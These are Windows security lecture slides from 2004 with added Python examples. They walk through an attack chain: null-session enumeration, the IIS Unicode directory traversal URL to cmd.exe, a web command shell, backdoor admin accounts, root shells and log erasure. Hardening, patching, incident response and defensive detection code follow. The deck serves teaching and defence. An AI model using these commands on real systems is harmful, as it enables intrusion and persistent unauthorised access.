Slide 1 1 Windows Security Analysis Computer Science E-Commerce Security ‘2004’ Matthew Cook http://escarpment.net/
Slide 2 2 Introduction Senior IT Security Specialist Loughborough University http://www.lboro.ac.uk/computing/
Slide 3 3 Windows Security Analysis Introduction Step-by-step Machine Compromise Preventing Attack Incident Response Further Reading
Slide 4 4 Introduction Basic Security Overview
Slide 5 5 Physical Security Secure Location BIOS restrictions Password Protection Boot Devices Case Locks Case Panels
Slide 6 6 Security Threats Denial of Service Theft of information Modification Fabrication (Spoofing or Masquerading)
Slide 7 7 Security Threats… Why a compromise can occur: Physical Security Holes Software Security Holes Incompatible Usage Security Holes Social Engineering Complacency
Slide 8 8 The Easiest Security Improvement Good passwords Usernames and Passwords are the primary security defence Use a password that is easy to type to avoid ‘Shoulder Surfers’ Use the first letters from song titles, song lyrics or film quotations
Slide 10 10 Background Reasons for Attack: Personal Issues Political Statement Financial Gain (Theft of money, information) Learning Experience DoS (Denial of Service) Support for Illegal Activity
Slide 11 11 Gathering Information Companies House Internet Search URL: http://www.google.co.uk Whois URL: http://www.netsol.com/cgi-bin/whois/whois A Whois query can provide: –The Registrant –The Domain Names Registered –The Administrative, Technical and Billing Contact –Record updated and created date stamps –DNS Servers for the Domain
Slide 12 12 Gathering Information… Use nslookup or dig against the domain’s own name servers: dig @ Different query types available: –A – Host (IPv4) address –ANY – All records the server will return –MX – Mail exchange records –SOA – Start of Authority (primary server, contact address, serial) –HINFO – Host information (CPU and OS, if the administrator filled it in) –AXFR – Zone transfer; a server that answers this for arbitrary hosts hands over the whole zone –TXT – Additional strings
Slide 13 13 Identifying System Weakness Many products available: Nmap, Nessus, pwdump, L0pht Crack, Null Authentication
Slide 14 14 Nmap Port Scanning Tool Stealth scanning, OS fingerprinting Open Source Runs under Unix-based OSs; a Win32 port is in development URL: http://www.insecure.org/nmap/
Slide 15 15 Nmap
Slide 16 16 Nessus Remote security scanner Very comprehensive Frequently updated modules Testing of DoS attacks Open Source Win32 and Java Client URL: http://nessus.org/
Slide 17 17 pwdump Version 3 (e = encrypted: the hashes are encrypted in transit from the remote machine) Developed by Phil Staubs and Erik Hjelmstad Based on pwdump and pwdump2 URL: http://www.ebiz-tech.com/html/pwdump.html Needs Administrative Privileges Extracts hashes even if SYSKEY is enabled Extracts from remote machines Identifies accounts with no password Self contained utility
Slide 18 18 L0pht Crack Password Auditing and Recovery Crack Passwords from many sources Registration $249 URL: http://www.atstake.com/research/lc3/
Slide 19 19 L0pht Crack Crack Passwords from: Local Machine Remote Machine SAM File SMB Sniffer PWDump file
Slide 21 21 Nmap Analysis… TCP Connect Scan Completes the full three-way handshake Very noisy: every connection reaches the application and is logged there, and an IDS sees it easily
Slide 22 22 Nmap Analysis… TCP SYN Scan Half-open scanning (the handshake is never completed, so the application never sees a connection) Less noisy than the TCP Connect Scan, though an IDS watching for SYNs that are never followed by an ACK still catches it
Slide 23 23 Nmap Analysis… TCP FIN Scan –FIN packet sent to target port –RST returned for closed ports, nothing at all for open ports –Works against RFC 793-conformant (Unix-derived) TCP/IP stacks; Windows answers FIN, Xmas and Null probes with RST whether the port is open or not, so against Windows these three scans report every port closed TCP Xmas Tree Scan –Sends a packet with FIN, URG and PUSH set –RST returned for closed ports TCP Null Scan –Turns off all flags –RST returned for closed ports UDP Scan –UDP packet sent to target port –“ICMP Port Unreachable” for closed ports; no reply means open or filtered, so UDP scans are slow and their results ambiguous
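The reply model for the scan types on slides 21 to 23, together with a small detector that picks those probes out of packet records, as an added example. This is not code from the presentation or from nmap; the flag bit values are the TCP header definitions and the packet records at the bottom are constructed.

```python
"""How nmap's TCP scan types read a target's replies, plus a detector that
spots those probes in packet records.  Added example: this is not code from
the presentation or from nmap.  Packet records at the bottom are constructed."""
from collections import defaultdict

# TCP header flag bits
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20

# Flag combination each scan type sends to a port
SCAN_PROBES = {"syn": SYN, "fin": FIN, "xmas": FIN | PSH | URG, "null": 0}

def target_reply(scan, port_open, rfc793_stack=True):
    """Reply the target sends to one probe.  rfc793_stack=True models a
    Unix-derived stack; False models the Windows stacks of the period, which
    answer FIN/Xmas/Null probes with RST regardless of port state."""
    if scan == "syn":
        return "SYN/ACK" if port_open else "RST"
    if scan not in SCAN_PROBES:
        raise ValueError("unknown scan type %r" % scan)
    if not rfc793_stack:
        return "RST"
    return None if port_open else "RST"      # None: probe silently dropped

def infer_state(scan, reply):
    """How the scanner interprets that reply."""
    if scan == "syn":
        return "open" if reply == "SYN/ACK" else "closed"
    return "closed" if reply == "RST" else "open|filtered"

def probe_type(flags):
    """Name the scan type a packet with exactly these flags belongs to,
    or None for ordinary traffic (ACK set, SYN/ACK, PSH/ACK, ...)."""
    for name, bits in SCAN_PROBES.items():
        if flags == bits:
            return name
    return None

def detect_scans(packets, min_ports=5):
    """packets: iterable of (src, dst, dport, flags).  Returns
    {src: {scan_type: number of distinct (dst, port) pairs probed}} for
    sources that sent one probe type to at least min_ports distinct ports;
    a single SYN to one port is a normal client and is not reported."""
    seen = defaultdict(lambda: defaultdict(set))
    for src, dst, dport, flags in packets:
        kind = probe_type(flags)
        if kind is not None:
            seen[src][kind].add((dst, dport))
    hits = {}
    for src, by_type in seen.items():
        flagged = {k: len(p) for k, p in by_type.items() if len(p) >= min_ports}
        if flagged:
            hits[src] = flagged
    return hits

# Constructed sample: 10.0.0.9 Xmas-scans eight ports on 10.0.0.5,
# while 10.0.0.7 is an ordinary web client.
SAMPLE_PACKETS = [("10.0.0.9", "10.0.0.5", p, FIN | PSH | URG)
                  for p in (21, 22, 25, 53, 80, 135, 139, 445)]
SAMPLE_PACKETS += [("10.0.0.7", "10.0.0.5", 80, SYN),
                   ("10.0.0.7", "10.0.0.5", 80, ACK),
                   ("10.0.0.7", "10.0.0.5", 80, ACK | PSH)]

if __name__ == "__main__":
    for stack in (True, False):
        print("rfc793" if stack else "windows",
              infer_state("fin", target_reply("fin", True, stack)))
    print(detect_scans(SAMPLE_PACKETS))
```

Run stand-alone it shows the point of slide 23: the same open port reads as open|filtered against an RFC 793 stack and as closed against a Windows stack, and the detector reports the Xmas scanner but not the normal client.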
Slide 24 24 Null Authentication Null Authentication (a ‘null session’: an SMB connection to the IPC$ share with an empty username and password): net use \\camford\IPC$ “” /u:“” Famous tools like ‘Red Button’ automate the enumeration net view \\camford lists the shares; over a null session an attacker can also pull: List of users, groups and shares Last logged on date Last password change Much more…
Slide 25 25 Exploiting the Security Hole Using IIS Unicode/Directory Traversal (MS00-078) The plain form /scripts/../../winnt/system32/cmd.exe?/c+dir is rejected by IIS; the encoded form /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir gets through because IIS checks the path for ‘..’ before it decodes %c0%af, an overlong UTF-8 encoding of ‘/’ Displays the listing of c: in browser Copy cmd.exe to /scripts/root.exe Echo upload.asp GET /scripts/root.exe?/c+echo+[blah]>upload.asp Upload cmdasp.asp using upload.asp Still vulnerable on 24% of E-Commerce servers
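Why the encoded request on slide 25 gets past IIS while the plain one does not, and how the check has to be ordered to close it, as an added example. This is not code from the presentation or from IIS: the lenient decoder imitates the old IIS behaviour of accepting overlong UTF-8, and the physical directory assumed for /scripts is an assumption.

```python
"""Why the encoded traversal works and how to close it.  Added example,
not code from the presentation or from IIS: the lenient decoder imitates the
old IIS behaviour of accepting overlong UTF-8, and the directory mapping for
/scripts is an assumption."""
import posixpath
from urllib.parse import unquote_to_bytes

SCRIPTS_DIR = "C:/Inetpub/scripts"   # assumed physical path of the /scripts virtual directory

def lenient_utf8(data):
    """Decode UTF-8 but also accept overlong two-byte forms such as C0 AF,
    which the vulnerable IIS decoder turned into '/'.  Python's own decoder
    rejects them, which is exactly the behaviour the fix relies on."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append("\ufffd")      # other multi-byte forms are not needed here
            i += 1
    return "".join(out)

def _under(root, path):
    return path == root or path.startswith(root + "/")

def vulnerable_map(url_path):
    """The IIS ordering bug: canonicalise and check the *encoded* path, then
    decode it.  url_path is the part of the request after '/scripts'."""
    candidate = posixpath.normpath(SCRIPTS_DIR + url_path)
    if not _under(SCRIPTS_DIR, candidate):
        raise PermissionError("traversal rejected")
    decoded = lenient_utf8(unquote_to_bytes(candidate))
    # the filesystem then resolves the '..' that only appeared after decoding
    return posixpath.normpath(decoded)

def hardened_map(url_path):
    """Decode strictly first, then canonicalise, then check the final path."""
    try:
        decoded = unquote_to_bytes(url_path).decode("utf-8")  # rejects overlong forms
    except UnicodeDecodeError:
        raise PermissionError("malformed encoding")
    candidate = posixpath.normpath(SCRIPTS_DIR + decoded)
    if not _under(SCRIPTS_DIR, candidate):
        raise PermissionError("traversal rejected")
    return candidate

def blocked(mapper, url_path):
    """True if mapper refuses url_path."""
    try:
        mapper(url_path)
        return False
    except PermissionError:
        return True

PLAIN = "/../../winnt/system32/cmd.exe"
ENCODED = "/..%c0%af../winnt/system32/cmd.exe"

if __name__ == "__main__":
    print("plain, vulnerable server blocks it:", blocked(vulnerable_map, PLAIN))
    print("encoded, vulnerable server maps to:", vulnerable_map(ENCODED))
    print("encoded, hardened server blocks it:", blocked(hardened_map, ENCODED))
```

The lesson generalises beyond %c0%af: any check that runs on a representation the server later transforms (URL decoding, Unicode normalisation, path canonicalisation) can be bypassed through that transform, so validate the final, fully decoded path.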
Slide 26 26 Gaining ‘Root’ Cmdasp.asp gives a command shell, but it runs as the IIS anonymous user (IUSR_<machine>), not as SYSTEM Increasing privileges is now simple: an ISAPI DLL loaded in-process by inetinfo.exe can call RevertToSelf() to drop the impersonation token and run as SYSTEM (Horovitz) Version 2 coded by Foundstone http://camford/scripts/idq.dll Patch Bulletin: MS01-026 (fix NOT included in Windows 2000 SP2)
Slide 27 27 Backdoor Access Create several user accounts with names that look like service accounts so they are overlooked: net user iisservice /ADD net localgroup administrators iisservice /ADD Add root shells listening on high-numbered ports: Tini is only 3 KB in size Add the backdoors to the ‘Run’ registry keys so they restart at boot or logon
Slide 28 28 System Alteration Web page alteration Information Theft Enable services Add VNC Creating a Warez Server Net start msftpsvc Check access Upload file 1Mb in size Advertise as a warez server
Slide 29 29 Audit Trail Removal Many machines have auditing disabled Main problems are IIS logs DoS IIS before logs sync to disc Erase logs from hard disc Erasing Eventlog harder IDS Systems Network Monitoring at firewall
Slide 30 30 Preventing Attack How to stop the attack from happening and how to limit the damage from crackers!
Slide 31 31 NetBIOS/SMB Services NetBIOS Name Service [UDP 137] NetBIOS Datagram Service, carries the browser announcements [UDP 138] MS-RPC endpoint mapper [TCP 135] NetBIOS Session Service, SMB over NetBIOS [TCP 139] CIFS/SMB direct hosting [TCP 445, UDP 445] Port 445 exists on Windows 2000 and later only Block these ports at the firewall Confirm what is actually listening with netstat -an
Slide 32 32 NetBIOS/SMB Services… To disable NetBIOS 1. Select ‘Disable NetBIOS’ in the WINS tab of advanced TCP/IP properties. 2. Deselect ‘File and Print sharing’ in the advanced settings of the ‘Network and Dial- up connections’ window
Slide 33 33 NetBIOS/SMB Services… Disable Null Authentication HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RestrictAnonymous REG_DWORD set to 0, 1 or 2: 0 = default, null sessions may enumerate users, groups and shares; 1 = null sessions may not enumerate SAM accounts and names; 2 = no access without explicit anonymous permissions (the strongest setting, but it can break domain trusts and browsing, so test before rolling it out) HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\RestrictAnonymous REG_DWORD set to 0 or 1
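A check that ties slides 31 to 33 together, as an added example (not code from the presentation): it parses the output of netstat -an for the NetBIOS/SMB listeners listed on slide 31 and reads the RestrictAnonymous level from slide 33 to say whether null-session enumeration is still possible. The netstat text and the registry reading at the bottom are constructed samples, not taken from a real machine.

```python
"""Check a Windows 2000-era host's NetBIOS/SMB exposure.  Added example, not
from the presentation: parses 'netstat -an' output and evaluates the LSA
RestrictAnonymous value.  The netstat text and registry values at the bottom
are constructed samples, not readings from a real machine."""
import re

# Ports the slides say to firewall, with what actually listens on them
NETBIOS_SMB_PORTS = {
    ("TCP", 135): "MS-RPC endpoint mapper",
    ("UDP", 137): "NetBIOS name service",
    ("UDP", 138): "NetBIOS datagram service (browser announcements)",
    ("TCP", 139): "NetBIOS session service (SMB over NetBIOS)",
    ("TCP", 445): "SMB direct hosting (CIFS), Windows 2000 and later",
    ("UDP", 445): "CIFS over UDP (reserved, rarely used)",
}

# Meaning of HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RestrictAnonymous
RESTRICT_ANONYMOUS = {
    0: "default: null sessions may enumerate users, groups and shares",
    1: "null sessions may not enumerate SAM accounts and names (shares still listable)",
    2: "no access without explicit anonymous permissions (may break trusts and browsing)",
}

# One netstat line: proto, local addr:port, foreign addr, optional state (TCP only).
# [ \t] rather than \s so the optional state cannot run on to the next line.
_LINE = re.compile(r"^[ \t]*(TCP|UDP)[ \t]+(\S+):(\d+)[ \t]+\S+(?:[ \t]+(\S+))?", re.M)

def exposed_listeners(netstat_text):
    """Return sorted [(proto, port, description)] for NetBIOS/SMB ports that
    are listening; established or closing TCP connections are ignored."""
    found = []
    for proto, _addr, port, state in _LINE.findall(netstat_text):
        port = int(port)
        if proto == "TCP" and state != "LISTENING":
            continue
        key = (proto, port)
        if key in NETBIOS_SMB_PORTS:
            found.append((proto, port, NETBIOS_SMB_PORTS[key]))
    return sorted(found)

def null_session_posture(lsa_values):
    """lsa_values: dict of values read from ...\\Control\\Lsa.  A missing
    RestrictAnonymous is treated as 0, the operating-system default."""
    level = int(lsa_values.get("RestrictAnonymous", 0))
    if level not in RESTRICT_ANONYMOUS:
        raise ValueError("unexpected RestrictAnonymous value %r" % level)
    return level, RESTRICT_ANONYMOUS[level]

def assess(netstat_text, lsa_values):
    """Combine both checks into findings a reviewer can act on."""
    listeners = exposed_listeners(netstat_text)
    findings = ["%s/%d open: %s" % (p, port, d) for p, port, d in listeners]
    level, meaning = null_session_posture(lsa_values)
    smb_reachable = any(port in (139, 445) for _p, port, _d in listeners)
    if level < 2 and smb_reachable:
        findings.append("null-session enumeration possible: RestrictAnonymous=%d (%s)"
                        % (level, meaning))
    return findings

# Constructed sample output of 'netstat -an' on a Windows 2000 server
SAMPLE_NETSTAT = """
  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:139            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    10.0.0.5:139           10.0.0.9:1035          ESTABLISHED
  UDP    0.0.0.0:137            *:*
  UDP    0.0.0.0:138            *:*
  UDP    0.0.0.0:445            *:*
"""
SAMPLE_LSA = {"RestrictAnonymous": 1}   # constructed registry reading

if __name__ == "__main__":
    for line in assess(SAMPLE_NETSTAT, SAMPLE_LSA):
        print(line)
```

On a real host feed it the output of netstat -an and the value read with a registry tool; the point of the combined check is that RestrictAnonymous=1 still leaves shares enumerable, so the finding only clears when the level is 2 or the SMB ports are not reachable at all.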
Slide 34 34 Operating System Patching Operating Systems do contain bugs, and patches are a common method of distributing these fixes. A patch or hot fix usually contains a fix for one discovered bug. Service packs contain multiple patches or hotfixes.
Slide 35 35 Operating System Patching… Only install patches after you have tested them in a development environment. Only install patches obtained direct from the vendor. Install security patches as soon as possible after released. Install feature patches as and when needed. Automate patch collection and installation as much as possible (QChain).
Slide 36 36 Operating System Patching… Use automated patching technology: SUS – Microsoft Software Update Services SMS – Microsoft Systems Management Server Ghost – Symantec imaging software. And other application deployment software: Lights out Distribution Deferred installation
Slide 37 37 IPSec IP security: authenticated and encrypted IP traffic at the network layer Linux connectivity using FreeS/WAN Mainly for wireless use, to supply the confidentiality WEP was meant to provide: WEP encryption has been cracked, and tools such as AirSnort recover the key from passively captured traffic URL: http://www.freeswan.org/ URL: http://airsnort.sourceforge.net/
Slide 38 38 Well Known Worms Nimda (2001) IIS directory traversal (Unicode exploit), among other vectors Slammer (2003) MS SQL Server Resolution Service buffer overflow, UDP 1434 (MS02-039) Blaster (2003) RPC DCOM vulnerability on TCP 135 (MS03-026) Sasser (2004) LSASS vulnerability on TCP 445 (MS04-011)
Slide 39 39 Incident Response What to do when something does go wrong!
Slide 40 40 Incident Response… Don’t Panic! Unplug the network cable (isolate the machine; do not power it off, or the volatile state you may need is lost) Get a notebook Back-up the system and keep the back-ups Restrict use of email Look for information Investigate the cause Request help and assistance.
Slide 41 41 Incident Response… Important to return to service swiftly –Do not jeopardize security –If in doubt, re-build –Perform forensics on a backup Keep documentation and evidence Contact the local CERT if the investigation shows the incident was more than worm or script-kiddie activity.
Slide 42 42 Further Reading Garfinkel, S. Web Security & Commerce. O’Reilly [ISBN 1-56592-269-7] Hassler, V. Security Fundamentals for E-Commerce. Artech House [ISBN 1-58053-108-3] Huth, M. R. A. Secure Communicating Systems. Cambridge University Press [ISBN 0-52180-731-X] Schneier, B. Secrets & Lies (Digital Security in a Networked World) [ISBN 0-47125-311-1]
Slide 43 43 Useful Books, Tools and URLs Securing Windows NT/2000 Servers for the Internet. (Stefan Norberg.) Incident Response. (Kenneth R. van Wyk, Richard Forno.) Hacking Exposed: Network Security Secrets & Solutions. (Stuart McClure et al) Hacking Exposed Windows 2000: Network Security Secrets and Solutions. (Scambray.)
Slide 44 44 Useful Books, Tools and URLs Microsoft Security Website http://www.microsoft.com/security/ Computer Security Incident Response Team http://www.cert.org/csirts/csirt_faq.html JANET CERT http://www.ja.net/cert/ Bugtraq Mailing List http://online.securityfocus.com/
Slide 45 45 Questions Slides available at: http://escarpment.net/